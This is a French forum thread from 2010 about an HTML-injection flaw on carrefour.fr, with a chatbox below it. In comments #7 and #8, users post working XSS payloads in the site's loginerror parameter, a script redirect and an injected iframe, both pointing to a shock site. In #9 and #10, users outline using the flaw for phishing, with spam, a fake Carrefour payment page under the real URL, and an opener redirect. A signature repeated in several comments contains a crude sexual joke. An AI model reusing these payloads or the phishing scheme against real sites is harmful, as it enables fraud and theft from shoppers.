l'asile.fr

5

Avec Carrefour, je positive

de SimOOn , le 30 mars 2010 à 20:51 - (carrefour.fr) - 10 commentaires
Hop, vous aussi faites de l'injection HTML excellente.

Proposer une brève

Détail des votes

Il y a 7 pour et 2 contre. Ce qui fait au total 9 votes.

À lire cette semaine...

groove_salad
#1 hOrny Lettuce

Ha ha, excellent !


"Elle a tort la petite: vu sa tronche, une sodomie à la moutarde est ce qu'elle peut espérer de mieux."
plantmann, Poète maudit.
mardi
30 mars 2010, 20:56
 
 

stillcut
#2

Ma vue baisse ?


mardi
30 mars 2010, 22:10
 
 

bloute
#3

Installe linux.


mardi
30 mars 2010, 23:51
 
 

hohun
#4 Comique tripier

Hahaha


mercredi
31 mars 2010, 01:38
 
 

groove_salad
#5 hOrny Lettuce

.


"Elle a tort la petite: vu sa tronche, une sodomie à la moutarde est ce qu'elle peut espérer de mieux."
plantmann, Poète maudit.
mercredi
31 mars 2010, 08:19
 
 

gwendal
#6 Détourageophile

Hahahaha :)


- les fautes
mercredi
31 mars 2010, 08:24
 
 

Kane
#7 Satan m'habite

Encore plus fort !

http://www.carrefour.fr/portal/site/carrefour/?loginerror=<script>windows.location.replace("www.lemonparty.org")</script>

Humf, la balise URL foire ...


mercredi
31 mars 2010, 09:24
 
 

Akshell
#8

[url]http://www.carrefour.fr/portal/site/carrefour/?loginerror=%3Ciframe%20src=%22http://www.lemonparty.org%22%20width=%22800%22%20height=%22600%22%3E%3C/iframe%3E[/url]


mercredi
31 mars 2010, 10:14
 
 

Kane
#9 Satan m'habite

haha ouai, la bonne vieille balise iframe!

Il y a moyen d'exploiter ça bien comme il faut : un bon gros SPAM avec un article en promo qui redirige vers la page en question. Sur cette page on fait afficher un faux site carrefour avec la vraie URL dans le navigateur.

Faut juste que l'utilisateur ne capte pas qu'il n'est pas en SSL au moment de payer.


mercredi
31 mars 2010, 10:38
 
 

Akshell
#10

sûrement avec un truc du genre opener.location.replace("www.lemonparty.org") dans l'iframe
j'ai pas trop envie de tester mais ça doit être possible en effet.


mercredi
31 mars 2010, 11:38
 
 


Ajouter un commentaire

Vous devez être identifié pour poster un commentaire.

# 08:03:57
(carwin) C'est l'ouverture de la chasse ! [url]
# 07:32:35
(carwin) 20:19:27 Les configs de canard sont de bonnes pistes [url]
# 08:42:13
(Sarki) 20:19:27 ça dépend de ce que tu cherches comme usage... Jeu? Bureautique? Fixe? Portable?
# 18:46:42
(hohun) Ouff ça fait 5 ans que j'ai pas zyeuté l'état du marché et des composants :D
# 20:19:27
(plantmann) Et ben, l'été a été calme ici, ma parole... J'espère que la rentrée s'est bien passée pour ceux qui ont des enfants (et pour les autres aussi en fait). Projet rachat d'ordi pour ma pomme, si vous avez des conseils ou avis
# 16:03:51
(carwin) 07:42:52 Yeah!
# 12:21:23
(carwin) Documentaire saisissant sur le reportage de guerre [url]
# 12:20:37
(carwin) Enfin une bonne nouvelle pour l'industrie du disque [url]
# 07:42:52
(hohun) 12:45:52 de rien ! J'espère que ça a plu !
# 12:45:52
(carwin) 08:20:56 Merci encore pour la prescription Sherlock !
lire la suite de la tribune